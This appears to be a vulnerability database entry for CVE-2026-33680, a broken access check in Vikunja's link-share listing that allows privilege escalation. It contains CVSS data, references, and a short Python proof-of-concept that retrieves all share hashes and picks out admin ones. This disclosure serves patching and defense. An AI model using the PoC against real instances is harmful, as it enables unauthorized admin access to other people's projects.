Security Vulnerability Report
中文
CVE-2026-33680 CVSS 7.5 HIGH

CVE-2026-33680

Published: 2026-03-24 16:16:36
Last Modified: 2026-03-30 13:42:38
Source: [email protected]

Description

Vikunja is an open-source self-hosted task management platform. Prior to version 2.2.2, the `LinkSharing.ReadAll()` method allows link share authenticated users to list all link shares for a project, including their secret hashes. While `LinkSharing.CanRead()` correctly blocks link share users from reading individual shares via `ReadOne`, the `ReadAllWeb` handler bypasses this check by never calling `CanRead()`. An attacker with a read-only link share can retrieve hashes for write or admin link shares on the same project and authenticate with them, escalating to full admin access. Version 2.2.2 patches the issue.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:* - VULNERABLE
Vikunja < 2.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL of the Vikunja instance target_url = "https://example.com/api/v1/projects/1/shares" # The read-only share hash obtained by the attacker read_only_token = "READ_ONLY_HASH_HERE" # Headers using the read-only token headers = { "Authorization": f"Bearer {read_only_token}" } # Send request to list all shares (Exploiting ReadAllWeb bypass) response = requests.get(target_url, headers=headers) if response.status_code == 200: shares = response.json() print("Successfully retrieved shares:") # Iterate through shares to find admin tokens for share in shares: # The vulnerability exposes the 'hash' for all shares share_id = share.get('id') share_role = share.get('role') share_hash = share.get('hash') print(f"Share ID: {share_id}, Role: {share_role}, Hash: {share_hash}") if share_role == 'ADMIN': print(f"[!] Found Admin Hash: {share_hash}") # Attacker can now use this hash to perform admin actions # Example: admin_headers = {"Authorization": f"Bearer {share_hash}"} else: print(f"Failed to exploit: {response.status_code}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33680", "sourceIdentifier": "[email protected]", "published": "2026-03-24T16:16:35.570", "lastModified": "2026-03-30T13:42:38.180", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vikunja is an open-source self-hosted task management platform. Prior to version 2.2.2, the `LinkSharing.ReadAll()` method allows link share authenticated users to list all link shares for a project, including their secret hashes. While `LinkSharing.CanRead()` correctly blocks link share users from reading individual shares via `ReadOne`, the `ReadAllWeb` handler bypasses this check by never calling `CanRead()`. An attacker with a read-only link share can retrieve hashes for write or admin link shares on the same project and authenticate with them, escalating to full admin access. Version 2.2.2 patches the issue."}, {"lang": "es", "value": "Vikunja es una plataforma de gestión de tareas de código abierto autoalojada. Antes de la versión 2.2.2, el método `LinkSharing.ReadAll()` permite a los usuarios autenticados con un enlace compartido listar todos los enlaces compartidos de un proyecto, incluyendo sus hashes secretos. Si bien `LinkSharing.CanRead()` bloquea correctamente a los usuarios de enlaces compartidos de leer enlaces compartidos individuales a través de `ReadOne`, el gestor `ReadAllWeb` omite esta verificación al no llamar nunca a `CanRead()`. Un atacante con un enlace compartido de solo lectura puede recuperar hashes de enlaces compartidos de escritura o de administrador en el mismo proyecto y autenticarse con ellos, escalando a acceso de administrador completo. La versión 2.2.2 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-285"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.2.2", "matchCriteriaId": "79DC3F0A-11CE-4DAA-884D-F285B5D344DD"}]}]}], "references": [{"url": "https://github.com/go-vikunja/vikunja/commit/9efe1fadba817923c7c7f5953c3e9e9c5683bbf3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-8hp8-9fhr-pfm9", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://vikunja.io/changelog/vikunja-v2.2.2-was-released", "source": "[email protected]", "tags": ["Release Notes"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.